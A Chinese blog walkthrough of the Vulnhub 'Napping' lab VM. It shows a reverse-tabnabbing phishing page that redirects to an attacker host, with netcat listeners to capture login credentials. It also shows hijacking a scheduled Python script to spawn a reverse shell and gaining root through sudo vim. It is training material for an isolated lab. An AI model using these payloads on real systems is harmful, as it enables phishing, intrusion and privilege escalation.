首页 > 其他分享 >Vulnhub靶场:NAPPING: 1.0.1

Vulnhub靶场:NAPPING: 1.0.1

时间:2024-06-08 18:31:56浏览次数:14  
标签:1.0 NAPPING py 端口 192.168 window html Vulnhub http

1.环境搭建

靶机下载:Napping: 1.0.1 ~ VulnHub

将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡

开启靶机

2.渗透过程

使用nmap工具扫描进行主机发现扫描

nmap -sn 192.168.56.0/24

发现靶机ip地址,使用nmap工具进行端口扫描

nmap -sS 192.168.56.121

发现22端口和80端口,使用浏览器访问80端口

发现是一个登陆页面,首先进行注册

点击按钮进行注册,用注册的用户名和密码进行登陆

登陆成功发现有一个输入框,查看一下网页源代码

发现一个a连接,输入一个url再次查看网页源代码

发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.56.101:7777/a.html');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.56.101:7777/a.html');
    </script>
</body>
</html>

然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)

<html>
        <body>
                aaa
        </body>
</html>

kali监听7777端口

nc -lvp 7777

kali开启临时http服务

python3 -m http.server 8000

在页面上提交恶意页面连接

http://192.168.56.101:8000/b.html

稍等一会返回用户名(daniel)和密码(C@ughtm3napping123)

利用用户名和密码进行ssh连接

ssh [email protected]

连接成功,查看用户所在的组

id

查看该组可以执行的程序

find / -group administrators 2>/dev/null

查看py文件

cat /home/adrian/query.py

发现它向site_status.txt文件写入东西,查看该txt文件

cat /home/adrian/site_status.txt

发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件

修改py文件

import os

os.system('/usr/bin/bash /home/daniel/shell.sh')

使用kali监听6666端口,然后等到py脚本自动执行

nc -lvp 6666

反弹shell成功

开始提权

sudo -l

这里使用vim提权

sudo vim -c ':!/bin/bash'

切换交互模式

python3 -c 'import pty;pty.spawn("/bin/bash")'

提权成功

进入root目录,查看文件

标签:1.0,NAPPING,py,端口,192.168,window,html,Vulnhub,http
From: https://blog.csdn.net/weixin_69670995/article/details/139467088

相关文章

  • [C++] 小游戏 能量1.0.2版本 zty出品
    大家好,欢迎来到今天的代码。我很荣幸能够在这里与大家见面。今天我想向大家介绍的是能量1.0.2版本。本次主要更新了人工智障的智商,没有以前那么笨了。先赞后看养成习惯CODE#include<bits/stdc++.h>#include<windows.h>usingnamespacestd;intrgzz(intlun,intdineng,......
  • 『vulnhub系列』HMS-1
    『vulnhub系列』HMS?-1下载地址:https://www.vulnhub.com/entry/hms-1,728/信息搜集:使用nmap进行存活主机探测,发现开启了21端口(ftp)和22端口(ssh)匿名登录ftp看看里面有什么东西,发现什么都没有ftp192.168.199.133#使用anonymous登录,无需输入密码进行全面扫描,发现开启了70......
  • 博客园文章目录生成脚本v1.0:支持多级、过滤空行、可指定文章、自定义插入点
    使用说明:1.设置-申请JS权限,等待审核通过2.设置-页脚HTML代码,代码贴进去保存 样式说明:1.默认目录插到文章顶部,可以加入<divid="toc"></div>标签自定义插入位置。2.H1和H2是加粗体,其他的是正常体。自定义功能:catalogue(true):给所有文章生成目录catalogue(false):只......
  • spark安装和编程实践(Spark2.1.0)
    环境准备1.VMware虚拟机(Linux操作系统)2.Windows7~113.JDK4.HadoopHadoop安装及集群环境配置-CSDN博客https://blog.csdn.net/2301_81921110/article/details/139362063?spm=1001.2014.3001.55015.Xshell7(用于连接虚拟机与Windows)6.Xftp7(用于虚拟机与Windows之间传输文......
  • Ubuntu server 24 (Linux) Snort3 3.2.1.0 Guardian IPtables 联动实战 主动防御系统(
    一  Snort3安装配置,参考:Ubuntuserver24安装配置snort33.2.1.0网络入侵检测防御系统配置注册规则集-CSDN博客二  安装主动防御程序Guardian1下载,解压tarzxvfguardian-1.7.tar.gzcdguardian-1.7/2 配置#拷贝文件sudocpguardian.pl/usr/local/bin/......
  • 『vulnhub系列』Hack Me Please-1
    『vulnhub系列』HackMePlease-1下载地址:https://www.vulnhub.com/entry/hack-me-please-1,731/信息搜集:使用nmap进行探测存活主机,发现主机开启了80端口和3306端口nmap192.168.0.*访问80端口的web服务使用dirsearch扫描目录,但是并没有可以访问的页面dirsearch-u"h......
  • Ubuntu server 24 安装配置 snort3 3.2.1.0 网络入侵检测防御系统 配置注册规则集
    一下载并安装源代码地址:https://github.com/snort3/snort3/releases#下载,解压wgethttps://github.com/snort3/snort3/archive/refs/tags/3.2.1.0.tar.gztarzxvf3.2.1.0.tar.gz二 安装软件依赖包1安装依赖包sudoaptupdatesudoaptinstallbuild-essentia......
  • 打靶笔记w1r3s.v1.0
    打靶笔记w1r3s.v1.0nmap扫描与分析主机发现nmap-sn192.168.218.0/24历史版本为-sP(已经被放弃)n不进行端口扫描192.168.218.155创建文件夹保存端口信息指定最低1万速率扫描所有端口nmap-sT--min-rate10000-p-192.168.218.155nmapscan/ports-sSSYN扫描是快......
  • 『vulnhub系列』EVILBOX-ONE
    『vulnhub系列』EVILBOX-ONE下载地址:https://www.vulnhub.com/entry/evilbox-one,736/信息搜集:使用nmap探测内网存活主机,发现开启了22和80端口nmap192.168.0.*访问80端口web服务,发现apache默认页面使用dirsearch进行目录爆破dirsearch-u"http://192.168.0.131"......
  • W1R3S: 1.0.1
    Name:W1R3S:1.0.1Daterelease:5Feb2018Author:SpecterWiresSeries:W1R3S主机探测和nmap扫描nmap-sn192.168.56.0/24Nmapscanreportfor192.168.56.127Hostisup(0.00041slatency).MACAddress:00:0C:29:88:35:4F(VMware)靶机ip:192.168.56.127全......